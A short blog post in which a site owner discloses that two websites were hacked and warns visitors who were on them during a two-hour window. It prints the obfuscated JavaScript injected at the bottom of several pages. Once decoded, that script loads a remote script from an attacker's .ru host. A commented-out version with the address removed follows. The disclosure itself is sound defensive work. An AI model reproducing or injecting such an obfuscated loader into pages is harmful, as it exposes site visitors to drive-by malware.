Two websites I'm running, Ambiera.com and this site, Irrlicht3d.org have been hacked yesterday. We are not sure yet how this happened, but if you visited this blog or Ambiera.com yesterday between 10 and 12 o'clock (UTC +1), it might be a good idea to run some anti virus software on your PC, I cannot say what the attacker extactly wanted to do: Somebody attached a javascript to the bottom of a few html sites. The code looked like this:
var Gldapnhsg069 = document.createElement('s$@c###(r^i&)p@&@t^)'.replace(/#|\^|\$|&|@|\!|\(|\)/ig, ''));var Hd1voqaixds8 = 'E1usw40fczkxa7';Gldapnhsg069.setAttribute('type', 't(^$e)x)t)(^/)@j(@a^v^&a#!#s$!c@&r@i^&&p)t!^'.replace(/\)|\(|&|#|\^|\!|\$|@/ig, ''));Gldapnhsg069.setAttribute('src', 'h!&(t(t!(p#:))!^/#/#!$f^r&@!e(&e^o(@n$e!s)$-@&(c&^(o!$m^^@$.#b^@a($)dj&$^o&@$j$@o&)#.!c)$$o#!#&m((.@&$i@b^@i(@)(b)!()o^$@-$@(!!c$!o^!(@m&)^@^.($^t@h)e$@m&)o##b$#&)i@^&s!(i#t$#e!.&&(r)#u^^@@:&@8(#0!8^(!0&!@)/$$)#g(@)#o)(o(@)!g$l!#&)e)@)).)!!^c$&)o)m!/#@g!o$&o^g$(l)$$^e.!^c#&o)$(#m@()/&^j#!$r)!)j@.#^!c#!o@!@m&.!)#c$(#!n))/&m&@@e!)@di)(!(a@$s!$e(t&@.)^@&i$(t@/((b$)a^&@&n)k(!^o()(f$&$a$$$m$e^(&r^i!((@c#((@a)).@@&c&!(o!#m&)/!^^'.replace(/\!|\$|&|@|\(|\)|#|\^/ig, ''));Gldapnhsg069.setAttribute('defer', 'd(!@e^()f$$(@e)#r@)'.replace(/@|\^|\)|\(|&|\$|\!|#/ig, ''));Gldapnhsg069.setAttribute('id', 'G@$@&0@!$&m&7$@@!p(@$!!x($c$d^$8$&c(^$$4&!w((^)4$$&@'.replace(/@|\$|\!|&|\)|\^|#|\(/ig, ''));document.body.appendChild(Gldapnhsg069);}} catch(Cla4d3870kj7) {}
(some random line breaks added by me for security)
I have not looked what this actually does, but if you are interested, feel free to have a look at this. Thanks to Jetro for quickly letting me know about this problem!
Commented the code out to avoid problems and renamed "Gldapnhsg069" to "scriptElement" for better reading:
/*
var scriptElement = document.createElement( 'script' );
var Hd1voqaixds8 = 'E1usw40fczkxa7';
scriptElement.setAttribute( 'type', 'txt/javascript' );
scriptElement.setAttribute( 'src', 'HERE COMES AN ADRESS');
scriptElement.setAttribute( 'defer', 'defer' );
scriptElement.setAttribute( 'id', 'G0m7px8c4w4' );
document.body.appendChild( scriptElement );
}} catch(Cla4d3870kj7) {}
*/